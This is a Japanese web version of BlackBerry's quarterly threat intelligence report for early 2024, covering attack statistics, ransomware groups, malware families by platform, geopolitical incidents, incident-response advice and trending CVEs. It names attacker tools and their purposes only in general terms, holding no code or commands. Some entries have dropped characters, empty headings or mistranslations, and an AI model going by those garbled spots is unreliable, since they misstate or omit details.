注目すべき脅威の実際
この BlackBerry レポートでは、2024 年 1 月から 3 月までの期間における世界的な脅威の状況を包括的にレビューしています。レポートのハイライトは次のとおりです。
630,000 件を超える悪意のあるハッシュが観測されました。これは、前回の報告期間と比較して1 分あたり40% 以上の増加です。
詳しくはこちらこの期間の合計攻撃数セクションをご覧ください。
攻撃全体の60%は重要なインフラに対するものでした。そのうち40%は金融部門を標的としていました。
詳細は 重要なインフラストラクチャ セクションをご覧ください。
CVE の56 パーセントは 7.0 以上と評価されました (10 が最も深刻)。CVE は、あらゆる形式のマルウェア、特にランサムウェアやインフォスティーラーで急速に武器化されています。
詳しくはこちら共通脆弱性識別子セクションをご覧ください。
新しいランサムウェア セクション: 世界中のトップ ランサムウェア グループと、このレポート期間中に最も活発なランサムウェアに関する新しいセクションを追加しました。
詳細については、 「ランサムウェアの著名人」セクションをご覧ください。
BlackBerry ®グローバル脅威インテリジェンス レポートは 3 か月ごとに発行されます。頻繁に更新されるため、CISO やその他の主要な意思決定者は、業界や地域における最新のサイバーセキュリティの脅威と課題について常に情報を得ることができます。
このレポートは、弊社のサイバー脅威インテリジェンス (CTI) チーム、インシデント対応 (IR) チーム、および CylanceMDR ™部門のセキュリティ専門家による調査、分析、結論の集大成です。スクロールを続けると詳細がわかります。よろしければ、フルレポートを こちらより ダウンロードお願いいたします。
Total Attacks This Period
今期の攻撃総数
2024 年 1 月から 3 月にかけて、BlackBerry のサイバーセキュリティ ソリューションは 310 万件を超えるサイバー攻撃を阻止しました。これは、1 日あたり 37,000 件を超えるサイバー攻撃を阻止したことになります。さらに、当社の顧客ベースを標的とした 1 日平均7,500 件の固有のマルウェア サンプルが確認されました。
このレポートでわかるように、攻撃の総数は必ずしもユニークハッシュ (新しいマルウェア) の数と相関しているわけではありません。次の 2 つのセクションの図 2 から 6 が示すように、すべての攻撃がユニークなマルウェアを使用するわけではありません。これは、攻撃者の動機、攻撃の複雑さ、および目的 (情報の盗難や金銭の盗難など) によって異なります。
BlackBerry のサイバーセキュリティ ソリューションは、310 万件を超えるサイバー攻撃を阻止しました。これは、1 日あたり 37,000 件を超えるサイバー攻撃を阻止したことになります。
国別攻撃
攻撃を防止
下の図 2 は、BlackBerry サイバーセキュリティ ソリューションが最も多くのサイバー攻撃を防いだ上位 5 か国を示しています。この報告期間中、BlackBerry ソリューションを使用している米国組織は、最も多くの攻撃を受けました。アジア太平洋 (APAC) 地域では、日本、韓国、オーストラリアも高いレベルの攻撃を受け、上位 5 か国にランクインしました。ラテン アメリカ (LATAM) では、ホンジュラスの顧客が集中的に攻撃を受け、同国はリストの 5 位にランクインしました。
ユニークなマルウェア
この報告期間中、BlackBerry は、2023 年 9 月から 12 月までの期間と比較して、新規ハッシュ (ユニーク マルウェア) が 1 分あたり 40%以上増加したことを確認しました (図 1)。図 2 は、BlackBerry サイバー セキュリティ ソリューションが記録した ユニークマルウェア ハッシュ数が最も多かった 5 か国を示しています。米国が最も多くなっています。アジア太平洋地域の韓国、日本、オーストラリアは、過去 3 か月間のランキングを維持しましたが、ブラジルが新たにリストに加わりました。
次のセクションで説明するように、他の攻撃者は、制御システムの脆弱性を悪用したり、ネットワーク上のデバイスに感染したりして、公共施設などの物理的なインフラストラクチャに損害を与えようとする可能性があります。
業界別の攻撃
前回のレポートと同様に、いくつかの主要な産業セクターを「重要インフラ」と「商業企業」という 2 つの包括的なセクションに統合しました。
サイバーセキュリティおよびインフラストラクチャセキュリティ庁 (CISA) の定義によると、重要インフラストラクチャには、医療、政府、エネルギー、農業、金融、防衛を含む16 の分野が含まれます。
これらのセクターのデジタル化が進むということは、その資産がサイバー犯罪者に対してより脆弱であることを意味します。脅威アクターは、システム構成の誤りや従業員に対するソーシャル エンジニアリング キャンペーンなどの脆弱性を介して、重要なシステムを積極的に悪用します。
商業企業には、製造業、資本財、商業および専門サービス、小売業が含まれます。企業は常にサイバー攻撃の魅力的なターゲットであり、接続デバイスやクラウド コンピューティングの使用の増加により、システムへの侵入が容易になっています。攻撃者もより巧妙になり、ソーシャル エンジニアリングを使用してアカウント認証情報を入手し、マルウェアを配布することがよくあります。
サイバーストーリーハイライト: 国際銀行
AllaKore RAT の標的となったメキシコの銀行と暗号通貨プラットフォーム
1 月、BlackBerry のサイバー脅威アナリストは、改良されたオープンソースのリモート アクセス ツールである AllaKore RAT を使用してメキシコの銀行や暗号通貨取引プラットフォームを標的とした、長期にわたる金銭目的のキャンペーンを発見しました。脅威アクターは、インストール プロセス中にユーザーの注意をそらすために、メキシコ社会保障庁 (IMSS) や正規の文書を模倣したルアーを使用して、銀行の認証情報や認証情報を盗むようにしました。このキャンペーンは 2021 年から継続しており、収益が 1 億ドルを超えるメキシコの大手企業をターゲットにしています。BlackBerry の調査結果によると、RAT ペイロードでメキシコの Starlink IP が使用され、スペイン語の指示が含まれていることから、脅威アクターはラテン アメリカを拠点としている可能性が高いことが示唆されています。詳細については、ブログの記事全文をお読みください。
重要なインフラへの脅威
弊社の内部テレメトリによると、BlackBerry のサイバーセキュリティ ソリューションが遭遇した業界特有のサイバー攻撃のうち、60% が重要なインフラストラクチャを標的としていました。さらに、固有のマルウェア ハッシュの 32% が重要なインフラストラクチャのテナントを標的としていました。
CylanceENDPOINT ™およびその他の BlackBerry サイバーセキュリティ ソリューションは、金融、医療、政府、公共事業などの重要な業界セクターに対する 110 万件を超える攻撃を阻止しました。この 110 万件の攻撃のほぼ半数が金融セクターに対するものでした。さらに、政府および公共セクターの組織は最も多様な攻撃を経験し、ユニーク ハッシュの 36% 以上がこのセクターをターゲットにしていました。
BlackBerry のテレメトリでは、世界中の重要なインフラを標的とする複数のマルウェア ファミリーが記録されています。たとえば、悪名高いインフォスティーラー LummaStealer は、特にラテン アメリカの食品および農業業界と、アジア太平洋地域のエネルギー部門を標的としていることが確認されています。このレポート期間中に確認された注目すべき脅威には、次のものがあります。
- 8Base ランサムウェア: ランサムウェア攻撃 | ヘルスケア分野
- Amadey (Amadey Bot) : 多機能ボットネット | 政府施設
- Buhti : ランサムウェア攻撃 | 商業用不動産
- LummaStealer (LummaC2) : C ベースのインフォスティーラー | 食品および農業セクター (LATAM) およびエネルギー セクター (APAC)
- PrivateLoader : ダウンローダー ファミリー | エネルギー部門
- Remcos (RemcosRAT) : 商用グレードのリモート アクセス ツール (RAT) | 食品および農業分野
- Vidar (VidarStealer) : 商品情報スティーラー |さまざまな分野:
- アジア太平洋諸国のエネルギー部門
- LATAM諸国のITセクター
- 北米の金融サービス部門
- 欧州、中東、アフリカ(EMEA)の政府施設部門
重要なインフラに対するこれらの脅威の詳細については、付録に記載されています。
External Threats Faced by Critical Infrastructure
重要インフラが直面する外部脅威
外部からの脅威とは、BlackBerry の内部テレメトリ外で記録されたサイバー攻撃のことです。この最新の報告期間中、より広範な世界的な脅威の状況において、重要なインフラストラクチャに対する注目すべき攻撃が数多く発生しました。
2023年後半に米国エネルギー省(DOE)の研究施設である米国アイダホ国立研究所(INL)で発生した侵害の影響は続いています。攻撃者は研究所のクラウドベースの人事管理プラットフォームOracle HCMに侵入し、45,000人以上の個人データを盗み出しました。ハクティビストグループのSiegedSecは数週間後にこの攻撃の責任を主張し、盗まれたデータの一部をオンラインの漏洩フォーラムに投稿しました。図7は、この報告期間中に発生した重要なインフラストラクチャに対する注目すべき脅威のタイムラインを示しています。
サイバーストーリーのハイライト: インフラストラクチャ、VPN、ゼロトラスト
緊急指令により、VPN の交換時期が来ている可能性が明らかに
仮想プライベート ネットワーク (VPN) のコア機能は 1996 年の開始以来ほとんど変わっていませんが、最近のセキュリティ侵害の大規模な発生や政府の指示により、VPN の使用を再検討する時期が来ている可能性があります。
重要な問題は、VPN の「信頼するが検証する」モデルです。このモデルは本質的にネットワーク境界内のユーザーに信頼を与えるため、サイバー攻撃に対して脆弱になります。このリスクを強調して、サイバーセキュリティおよびインフラストラクチャセキュリティ庁 (CISA) は最近、重大な VPN の脆弱性に対処する緊急指令を発行し、リスクのある製品の迅速な接続解除を促しました。ブログで全文をお読みください。
商業企業への脅威
業界がサイバーセキュリティの脅威の影響を受けるのと同様に、個々の企業もサイバー攻撃と戦っています。特に、財務、通信、販売、調達、その他の業務運営においてデジタル インフラストラクチャへの依存度が高い傾向にあるためです。新興企業から多国籍コングロマリットまで、あらゆる企業がサイバー脅威、特にランサムウェアの影響を受けています。
前回の報告期間を通じて、BlackBerry のサイバーセキュリティ ソリューションは、商業企業部門内の業界を標的とした70 万件の攻撃をブロックしました。
当社の内部テレメトリによると、前回の報告期間と比較して、商業企業では次のようなことが確認されました。
- 彼らが直面した攻撃の数は2パーセント増加しました。
- 遭遇したユニークハッシュが 10 パーセント増加しました。
商業企業は、サービスとしてのマルウェア (MaaS) 事業を通じて販売されるインフォスティーラーの脅威に直面しています。多くの場合、これらの脅威は被害者のデバイスに追加のマルウェアを展開します。セキュリティ製品や従来のウイルス対策 (AV) ソフトウェアを回避するために、サイバー軍拡競争の中で進化を続けています。BlackBerry テレメトリで確認された蔓延しているマルウェアには、次のものがあります。
- RedLine (RedLine Stealer):インフォスティーラー
- SmokeLoader:一般的に利用され、多用途に使われるマルウェア
- PrivateLoader:マルウェアの媒介者
- RaccoonStealer: MaaS 情報窃取者
- LummaStealer (LummaC2) : マルウェア情報スティーラー
営利企業に対するこれらの脅威の詳細については、付録に記載されています。
External Threats Faced by Commercial Enterprise
商業企業が直面する外部の脅威
ランサムウェアは、あらゆる規模や業種の組織にとって蔓延している脅威です。最近のランサムウェア攻撃の例は次のとおりです。
- ティンバーランド、ザ・ノース・フェイス、ヴァンズなどの有名スポーツウェアブランドを製造する米国のVFコーポレーションは、 2023年12月にALPHVランサムウェア集団によるランサムウェア攻撃の被害に遭いました。攻撃者は3,500万人以上の顧客のデータを盗み、重要なホリデーシーズン中に注文処理の遅延やその他の混乱を引き起こしました。
- スウェーデンのスーパーマーケットチェーンであるCoop Värmlandは、Cactusランサムウェア集団によるランサムウェア攻撃により、繁忙期の休暇期間が中断されました。
- ドイツの有名メーカー、ティッセンクルップは2024年2月に自動車部門で情報侵害を受けました。同社は後に、この攻撃は失敗したランサムウェア攻撃だったと発表しました。
- 3月、ランサムウェア集団「ストーマス」が、20種類以上のビールブランドを生産するベルギーのデュベル・モルトガット醸造所を攻撃し、88GBのデータを盗みました。
ランサムウェア業界の有名人
上記の出来事が示しているように、ランサムウェアは BlackBerryグローバル脅威インテリジェンス レポート全体で蔓延している脅威です。このレポートでは、このレポート期間中に活動していたランサムウェア グループに関するセクションを導入しました。
ランサムウェアは、サイバー犯罪者や組織犯罪グループが採用する普遍的なツールであり、世界中のあらゆる業界の被害者をターゲットにしています。これらのグループのほとんどは金銭目的であり、従来のサイバーセキュリティ防御を回避するために新しい戦術や手法をすぐに採用し、新しいセキュリティの脆弱性をすぐに悪用します。
ランサムウェアはますます医療機関を標的にしており、これは懸念すべき傾向です。 医療記録のデジタル化が進み、これらのサービスが中断した場合に深刻な結果が生じる可能性があるため、医療はランサムウェア グループにとって利益の多い分野です。この報告期間中に世界中で注目すべき攻撃が発生しており、これらの攻撃的なシンジケートは人命を危険にさらし、患者の重要な個人識別情報 (PII) データへの医療従事者のアクセスを制限または遮断する可能性があります。
医療への攻撃は、病院、診療所、薬局、薬剤販売店の機能不全、患者が重要な医薬品を入手できない、救急車のルート変更、医療処置のスケジュールの混乱など、深刻な連鎖反応を引き起こす可能性があります。二次的な影響としては、データ漏洩や患者の機密個人情報がダークウェブで販売されることなどが挙げられます。このため、2024年を通じて医療は公的にも私的にも引き続き激しい攻撃を受けると予測しています。
この報告期間における主要なランサムウェアのプレイヤー
以下は、この報告期間中に世界中で活動していた注目すべきランサムウェア脅威グループです。
ハンターズ・インターナショナル
ハンターズ・インターナショナルは、2023年後半から活動しているランサムウェア・アズ・ア・サービス(RaaS)犯罪シンジケートであり、2024年初頭に注目を集めました。このグループは、2023年初頭に法執行機関によって閉鎖されたHiveランサムウェアグループから派生した可能性があります。このグループは、最初に被害者のデータを身代金として暗号化し、次に盗んだデータを公開すると脅してさらに金を要求するという二重の恐喝スキームを採用しています。ハンターズ・インターナショナルは現在、世界中で活動しています。
8Base
2022年に初めて確認された8Baseランサムウェアグループは、2023年後半に注目を集めました。この活発なグループは、さまざまな戦術、技術、手順(TTP)を使用しており、非常に機会を狙っています。このグループは、新たに公開された脆弱性をすぐに悪用し、Phobosを含むさまざまなランサムウェアを活用しています。
LockBit ロシアを拠点とするランサムウェアグループであるLockBitは、同名のマルウェアを通じて RaaS を提供することに特化しています。2020 年に発見された LockBit ランサムウェアは、最も攻撃的なランサムウェアグループの 1 つになりました。特徴は次のとおりです。
- 暗号化前に被害者のデータを盗み出し、ダークウェブ上の漏洩サイト経由でホストするためのカスタムツール。
- 主に北米の被害者をターゲットにしており、次に中南米の被害者をターゲットにしています。
- 二重の恐喝戦略を採用します。
2024年2月、 国際法執行機関のクロノス作戦により、LockBitの活動は妨害されました。しかし、LockBitはその後立ち直ったようで、ランサムウェア分野では依然として主要な存在です。
Play
2022年に初めて確認された Playは、 匿名通信を可能にするTORベースのサイトで盗んだデータをホストし、身代金を支払わない場合はデータを漏洩すると脅迫する、複数の恐喝を行うランサムウェアグループです。Playは、主に北米の中小企業(SMB)を標的にしていますが、この報告期間中はEMEA地域でも標的にされていました。このグループは、検出とラテラルムーブメントのTTPに、Cobalt Strike、Empire、Mimikatzなどの既成ツールを主に活用しています。また、ランサムウェア実行前に使用されるカスタム偵察および情報窃取ツールであるGrixbaも利用していました。
BianLian
BianLian は、2022 年から出回っている GoLang ベースのランサムウェアです。この報告期間中、この関連グループは活発に活動しており、北米を拠点とする被害者を重点的に狙っています。多くのランサムウェア グループと同様に、 BianLian は 最近公開された脆弱性を巧みに悪用し、さまざまな業界の中小企業を狙うことがよくあります。PingCastle、Advance Port Scanner、SharpShares などのさまざまな既成ツールを使用して、標的のシステムに足がかりを築き、機密データを盗み出してランサムウェアを実行します。この盗まれたデータは、身代金が支払われるまで恐喝戦術として活用されます。
ALPHV ALPHV は、
BlackCatまたは Noberusとも呼ばれ 、2021 年後半から活動している RaaS オペレーションです。ALPHV の背後にいる脅威グループは非常に洗練されており、Rust プログラミング言語を活用して、Windows、Linux、VMWare ベースのオペレーティング システムをターゲットにしています。ALPHV は、北米の被害者をターゲットにする傾向があります。
ランサムウェアグループは、従来のサイバーセキュリティ防御を回避するために新しい戦術や手法を迅速に採用し、新たなセキュリティの脆弱性を迅速に悪用します。
サイバーストーリーハイライト: ランサムウェアとヘルスケア
12日間の収益なし: 医療分野でランサムウェアの影響が続く
アメリカ病院協会(AHA)によると、3月に医療業界は「前例のない」ランサムウェア攻撃に見舞われ、病院や薬局の業務が混乱に陥入りました。年間150億件の医療取引を処理するChange Healthcareへの攻撃は、臨床意思決定支援や薬局業務などの患者ケアサービスに深刻な影響を及ぼしました。この混乱により、影響を受けた医療行為の収益は12日間停止し、患者は重要な処方箋を入手するのに苦労したのです。現在、米国保健福祉省公民権局が調査中ですが、最新のデータではサイバー脅威が大幅に増加しており、過去5年間で大規模なハッキング侵害が256%増加していることが明らかになっています。この事件は、医療業界におけるサイバーセキュリティ対策の強化が極めて重要であることを強調しているのです。この差し迫った問題の詳細については、当社のブログで全文をお読みください。
地政学的分析とコメント
地政学的紛争はサイバー攻撃をますます促進しています。デジタル技術は善のために役立つ強力なツールになり得ますが、国家や非国家主体によって悪用される可能性もあります。2024 年の最初の 3 か月間で、ヨーロッパ、北米、アジア太平洋地域の議員が標的型スパイウェア攻撃の被害に遭いました。脅威アクターは複数の政府機関の IT システムに侵入し、軍事システムを侵害し、世界中の重要なインフラストラクチャを混乱させました。
こうした侵入の動機は複雑で不透明な場合が多いのですが、最も重大な最近の事件は、ロシアのウクライナ侵攻、イスラエルとイランの高まる侵略行為、南シナ海とインド太平洋地域で続く緊張など、大きな地政学的分裂に関連したものでした。
ウクライナでは、戦争のサイバー面が引き続き悪化しています。サイバー空間での合法的な行為を規定する国際規範に反して、ウクライナに対する攻撃は民間インフラと軍事インフラを区別せずに行われています。1月、ロシアのエージェントはキエフの住宅のウェブカメラに盗聴器を仕掛け、同市へのミサイル攻撃を開始する前に同市の防空システムに関する情報を収集したとされています。報道によると、攻撃者はカメラアングルを操作して近くの重要インフラに関する情報を収集し、より正確なミサイル攻撃の標的としたといわれています。
ロシアのサイバー脅威アクターは、ウクライナ最大の携帯電話プロバイダーであるキエフスターへの攻撃にも関与していることが判明しており、この攻撃では重要なインフラが破壊され、ウクライナの顧客2,400万人へのアクセスが遮断されました。この攻撃は、バイデン大統領がワシントンDCでゼレンスキー大統領と会談するわずか数時間前に発生しました。EUの議員も、自分の携帯電話がスパイウェアに感染していることに気付きました。これらの議員の多くは、ウクライナに対するEUの支援について勧告を行う欧州議会の安全保障・防衛小委員会のメンバーだったのです。3月には、ロシアの攻撃者が、ウクライナに対する軍事支援の可能性についてドイツ軍当局者同士の会話を傍受しており、増加するスパイ活動から通信を保護する必要性が高まっています。
イランとイスラエルの軍事活動が激化するにつれ、イスラエル政府の施設に対するサイバー攻撃も激化しています。報復として、イスラエルの攻撃者はイラン全土のガソリンスタンドの 70% を妨害しました。一方、米国はフーシ派反乱軍と情報を共有していた紅海のイラン軍のスパイ船に対してサイバー攻撃を開始しました。
インド太平洋地域では、中国系グループによるサイバー攻撃やスパイ活動が引き続き増加しています。米国土安全保障省のサイバー安全審査委員会は、 2023年夏のMicrosoft Online Exchangeインシデントに関する重要な報告書を発表 し、中国系攻撃者がMicrosoftからソースコードを盗んだ方法を詳細に記録しました。脅威グループStorm-0558は、米国国務省、米国商務省、米国下院、英国のいくつかの政府部門の職員や職員を侵害しました。報告書によると、脅威アクターは国務省だけで約6万件の電子メールをダウンロードすることに成功したとのことです。
これは孤立した事件ではなかった。2024年3月、米国司法省とFBIは、中国の攻撃者が中国問題に関する列国議会同盟の英国、EU、米国、カナダの複数のメンバーを標的にしていたことを明らかにした。
前述のように、金融および医療分野では特に重要なインフラに対する攻撃が増加しています。2024年の最初の3か月間に、フランスの健康保険会社で大規模なデータ侵害が発生し、機密性の高い個人情報が漏洩しました。カナダでは、サイバーインシデントが発生した後、金融取引および報告分析センター(FINTRAC)がシステムをシャットダウンしました。これを受けて、カナダ政府はFINTRACのサイバーレジリエンスを強化し、データセキュリティ保護策を構築するために2,700万カナダドルを割り当てました。
世界中の政府は、サイバースパイ活動やサイバー攻撃の試みの増加に直面し、サイバーセキュリティの強化に投資しています。カナダは最近、サイバー防衛への投資額が過去最高レベルに達したと発表し、英国は防衛費をGDPの2.5%に増額しました。サイバーセキュリティは、政府にとっても民間セクターにとっても依然として最大のリスクの1つであり、地政学的緊張が高まり続ける限り、この傾向は続くと思われます。
インシデント対応の概況
BlackBerry インシデント対応チームの見解
これは、BlackBerry チームが対応した IR エンゲージメントの種類と、組織がそのような侵害を防ぐために実行できるセキュリティ対策の概要です。
- ネットワーク侵入:最初の感染ベクトルが、Web サーバーや仮想プライベート ネットワーク (VPN) アプライアンスなどの脆弱なインターネット接続システムであったインシデント。場合によっては、侵入によってターゲットの環境内にランサムウェアが展開され、データが流出しました。
- 予防: インターネットに公開されているすべてのシステムにセキュリティ更新をタイムリーに適用します。(MITRE – 外部リモート サービス、T1133 )
- インサイダーによる不正行為:現従業員または元従業員が許可なく会社のリソースにアクセスしました。
- 予防策: すべてのシステムに強力な認証セキュリティ制御を実装します。正式な会社従業員のオフボーディング手順を実装します。(MITRE – 有効なアカウント: クラウド アカウント、T1078.004 )
- ランサムウェア:対応したすべてのインシデントの 10% がランサムウェアベースでした。
- 予防: 電子メール、VPN、Web サーバーなどのインターネット接続サービスにタイムリーにパッチを適用します。これにより、脅威アクターが脆弱なデバイスまたはシステムを介して企業ネットワークにアクセスした後、ランサムウェアを展開するなどの目的にアクセスしてさらに行動を起こすことを防ぐことができます。(MITRE – 外部リモート サービス、T1133 )
- 予防策: 組織がすべての重要なデータのコピーを 2 つ保持し、元のデータ ソースから 2 つの異なるメディア形式で保存し、少なくとも 1 つのコピーをオフサイトに保管することを確認します。
サイバーセキュリティ インシデントの検出、封じ込め、回復には、被害を最小限に抑えるための迅速な検出と対応が必要です。組織には、十分に文書化されたインシデント対応計画と、潜在的な侵害の兆候が最初に現れたときにすぐに対応できる訓練を受けた人員とリソースを用意しておくことが不可欠です。これにより、セキュリティ チームは問題をできるだけ早く検出し、脅威を迅速に封じ込めて根絶し、ビジネスやブランドの評判への影響、金銭的損失、組織に対する法的リスクを軽減できます。
脅威アクターとツール
脅威アクター
2024 年の最初の 3 か月間に、数十の脅威グループがサイバー攻撃を仕掛けました。ここでは、最も影響力のあった攻撃を取り上げます。
LockBit
2月、NCA、FBI、ユーロポールは、「オペレーション・クロノス」と呼ばれる世界規模の協調的な取り組みを通じて、10か国の法執行機関と協力し、ロックビット・グループのインフラと漏洩サイトを掌握し、サーバーから情報を収集し、逮捕し、制裁を課しました。
しかし、それから1週間も経たないうちに、ランサムウェアグループは再編成して攻撃を再開し、法執行機関の妨害を受けて、更新された暗号化ツールと被害者を新しいサーバーに誘導する身代金要求メッセージを採用しました。
LockBit は、キャピタル ヘルス病院ネットワークを含むさまざまなネットワークに対するサイバー攻撃の責任を主張しました。どちらの場合も、同社は身代金を速やかに支払わなければ機密データを公開すると脅迫しました。
Rhysida
APT29
CISA は最近、APT29 が標的を拡大し、他の業界や地方自治体も対象にしていると警告しました。この脅威グループは、さまざまなカスタム マルウェアを使用することで知られており、最近は侵害されたサービス アカウントや盗まれた認証トークンを使用してクラウド サービスも標的にしています。
この報告期間中、APT29 は パスワード スプレー攻撃に続いて Microsoft テスト テナント アカウントにアクセスし、悪意のある OAuth アプリケーションを作成して企業のメール アカウントにアクセスしたことが確認されました。さらに、 2024 年 1 月に初めて確認されたバックドアである WINELOADER を使用してドイツの政党を標的にしました。
Akira
Akira は次のようなツールを使用することが知られています。
- Active Directory を照会するための AdFind。
- 資格情報にアクセスしてくれたMimikatzとLaZagneに感謝します。
- ファイアウォールやその他のセキュリティ対策の背後にあるネットワークにトンネリングするための Ngrok。
- リモート アクセス用の AnyDesk。
- ネットワーク上のデバイスを見つけるための高度な IP スキャナー。
脅威アクターが使用する主なツール
Mimikatz
Cobalt Strike
Ngrok
ConnectWise
プラットフォーム別の蔓延する脅威: Windows
Remcos
リモートアクセス型トロイの木馬
Remcosとは、Remote Control and Surveillanceの略で、被害者のデバイスにリモートアクセスするためのアプリケーションです。
Agent Tesla
情報摂取型マルウェア
gent Teslaは.NETベースのトロイの木馬で、MaaSとして販売されることが多く、主にクレデンシャル・ハーベスティングに使用されます。
RedLine
情報摂取型マルウェア
RedLineマルウェアは、幅広いアプリケーションやサービスを利用して、クレジットカード情報、パスワード、クッキーなど、被害者のデータを不正に流出させます。
RisePro
情報摂取型マルウェア
RiseProの更新されたバリエーションは前回のレポートで確認されたが、今回の報告期間中、この情報窃取者は、GitHubリポジトリ上で「クラックされたソフトウェア」として偽って配布される新たなキャンペーンで確認されました。
SmokeLoader
バックドア
SmokeLoaderは、他のペイロードをダウンロードして情報を盗むために使用されるモジュール型のマルウェアです。当初は2011年に観測されましたが、現在も活発な脅威となっています。
Prometei
暗号通貨マイナー/ボットネット
Prometeiは、主にMoneroコインを標的とするマルチステージのクロスプラットフォーム暗号通貨ボットネットです。このボットネットは、ペイロードを調整してLinuxまたはWindowsプラットフォームをターゲットにすることができます。Prometeiは、可能な限り多くのエンドポイントに拡散するために、Mimikatzとともに使用されています。
Buhti
ランサムウェア
uhtiは、LockBitやBabukのような他のマルウェアの既存のバリエーションを利用し、LinuxやWindowsシステムを標的にしたランサムウェアです。
プラットフォーム別の蔓延する脅威: Linux
XMRig
号通貨マイナー
この報告期間中、XMRigが引き続き流行しています。このマイナーはMoneroを標的としており、脅威者は被害者のシステムを使用して、被害者が知らないうちに暗号通貨を採掘することができます。
NoaBot/Mirai
分散型サービス拒否(DDoS)
NoaBotは、Miraiの亜種としてやや洗練されています。Miraiに比べて難読化技術が向上しており、拡散にはTelnetではなくSSHを使用します。また、GCCの代わりにuClibcでコンパイルされており、検知を困難にしています。
XorDDoS
DDoS
私たちのテレメトリで頻繁に観測されるXorDDoSは、Linuxを実行するインターネットに面したデバイスを標的とし、C2命令によって感染したボットネットを調整するトロイの木馬型マルウェアです。その名前は、実行データと通信データへのアクセスを制御するためにXOR暗号を使用することに由来します。
AcidPour
Wiper
々のテレメトリには存在しないが、データ・ワイパーAcidPourの新バージョンが野生で確認されています。このマルウェアの最新バージョンは、ルーターやモデム上のファイルをワイプするために利用され、特にLinux x86デバイスを標的とするように設計されています。
プラットフォーム別の蔓延する脅威: MacOS
RustDoor
バックドア
RustDoorはRustベースのバックドア型マルウェアで、主に正規プログラムのアップデートを装って配布されます。このマルウェアは、Mach-o ファイルを含む FAT バイナリとして拡散します。
Atomic Stealer
情報摂取型マルウェア
Atomic Stealer (AMOS)の新バージョンが発見され、依然として流行しています。このステーラーの最新バージョンは、検知されないようにPythonスクリプトを使用します。AMOSは、パスワード、ブラウザ・クッキー、オートフィル・データ、暗号ウォレット、Macキーチェーンデータを標的としています。
Empire Transfer
情報摂取型マルウェア
2024年2月にMoonlock Labによって発見された情報窃取者。仮想環境で実行されていることを検知すると「自己破壊」することが出来ます。これにより、マルウェアは検知されずに残り、防御側にとっては分析がより困難になります。Empire Transferは、パスワード、ブラウザのクッキー、暗号ウォレットを標的とし、Atomic Stealer (AMOS)と同様の手口を利用します。
プラットフォーム別の蔓延する脅威: Android
SpyNote
情報摂取型マルウェア/RAT
SpyNoteは、Android Accessibility Serviceを利用してユーザーデータをキャプチャし、キャプチャしたデータをC2サーバーに送信します。
Anatsa/Teabot
情報摂取型マルウェア
にトロイの木馬型アプリケーションとしてGoogle Playストアを通じて配布されます。トロイの木馬型アプリケーションから最初に感染した後、AnatsaはC2サーバーから被害者のデバイスに追加の悪意のあるファイルをダウンロードします。
Vultur
情報摂取型マルウェア/RAT
2021年に初めて発見されたVulturは、トロイの木馬アプリケーションや「スミッシング(SMSフィッシング)」と呼ばれるソーシャルエンジニアリングの手法を通じて配布されてきました。データの流出に加え、脅威者はファイルシステムに変更を加え、実行権限を変更し、Android Accessibility Servicesを使用して感染したデバイスを制御することができます。
Coper/Octo
情報摂取型マルウェア/RAT
botファミリーの亜種。MaaS製品としてパッケージ化され、キーロギング、SMSモニタリング、スクリーンコントロール、リモートアクセス、C2オペレーションなどの機能を持ちます。
一般的な脆弱性と露出
共通脆弱性識別子 (CVE) は、既知のセキュリティ脆弱性と露出を特定、標準化、公開するためのフレームワークを提供します。前述のように、サイバー犯罪者は CVE を使用してシステムに侵入し、データを盗むことが増えています。この報告期間中、Ivanti、ConnectWise、Fortra、Jenkins 製品で見つかった新しい脆弱性により、悪意のある人物は被害者を狙う新しい方法を手に入れました。さらに、ここ数か月で、XZ バックドアを使用したオープンソース プロジェクトに存在する可能性のあるサプライ チェーン攻撃のリスクが明らかになりました。このバックドアは、ほぼすべての Linux インストールで利用可能なデータ圧縮ユーティリティである XZ Utils に意図的に埋め込まれていました。
1 月から 3 月にかけて、米国国立標準技術研究所 (NIST) から8,900 件近くの新しい CVEが報告されました。基本スコアは、0 から 10 までの重大度スコアの計算に使用できる、慎重に計算された指標で構成されています。支配的な CVE 基本スコアは「7」で、合計スコアの 26% を占めました。これは、前回の報告期間と比較してこの CVE スコアが 3% 増加したことを意味します。3 月は、今年これまでで最も多くの CVE が新たに発見され、約 3,350 件の新しい CVE が発見されました。トレンド CVE テーブルは、NIST 国家脆弱性データベースにリストされている特定の脆弱性を参照しています。
トレンドの CVE
XZ ユーティリティ バックドア
CVE-2024-3094 (10 重大)
不正アクセス
この悪意のあるコードは、 XZ Utils バージョン 5.6.0 および 5.6.1に埋め込まれていました。バックドアは sshd を操作し、認証されていない攻撃者に影響を受ける Linux ディストリビューションへの不正アクセスを許可していました。
Ivanti のゼロデイ脆弱性
CVE-2024-21887 (9.1 重大); CVE-2023-46805 (8.2 高); CVE-2024-21888 (8.8 高); CVE-2024-21893 (8.2 高)
任意のコード実行
今年初め、Ivanti Connect Secure (9.x、22.x) および Ivanti Policy Secure (9.x、22.x) 製品に認証バイパスとコマンドインジェクションの脆弱性が見つかりました。脅威アクターがこれら 2 つを組み合わせて使用した場合、 悪意のあるリクエストを作成し、システム上で任意のコマンドを実行できるようになります。
1月、Ivantiは、 製品に影響を及ぼすさらに2つの脆弱性、CVE-2024-21888(権限昇格の脆弱性)とCVE-2024-21893(サーバー側リクエストフォージェリの脆弱性)についても 警告しました。国家レベルの攻撃者は 、これらのゼロデイ脆弱性を悪用して、カスタムマルウェア株を展開しています。
Windows SmartScreen バイパス
CVE-2024-21412 (8.1 高)
セキュリティバイパス
これは、Microsoft Windows のインターネット ショートカット ファイルに影響するインターネット ショートカット ファイルのセキュリティ機能バイパスです。 セキュリティ チェックをバイパスするには、ユーザーの操作が必要です。最初の操作で、一連の実行が発生し、最終的に被害者は悪意のあるスクリプトに誘導されます。この ゼロデイ脆弱性は、 脅威グループによって DarkMe RAT を展開するために使用されました。
Windows カーネルの昇格脆弱性
CVE-2024-21338 (7.8 高)
権限の昇格
この脆弱性を悪用すると、攻撃者はシステム権限を取得できます。Lazarus Group (北朝鮮の脅威グループ) は、Windows AppLocker ドライバー (appid.sys) 内で見つかったこのゼロデイ脆弱性を悪用して、カーネルレベルのアクセスを取得しました。
Fortra の GoAnywhere MFT エクスプロイト
CVE-2024-0204 (9.8 重大)
認証バイパス
1 月に、Fortra は、 GoAnywhere MFT 製品に影響を及ぼす重大なバイパスを共有するセキュリティ アドバイザリを公開しました 。この脆弱性は、Fortra の GoAnywhere MFT 7.4.1 より前に発見されました。これを悪用すると、権限のないユーザーが管理ポータル経由で管理者ユーザーを作成できるようになります。
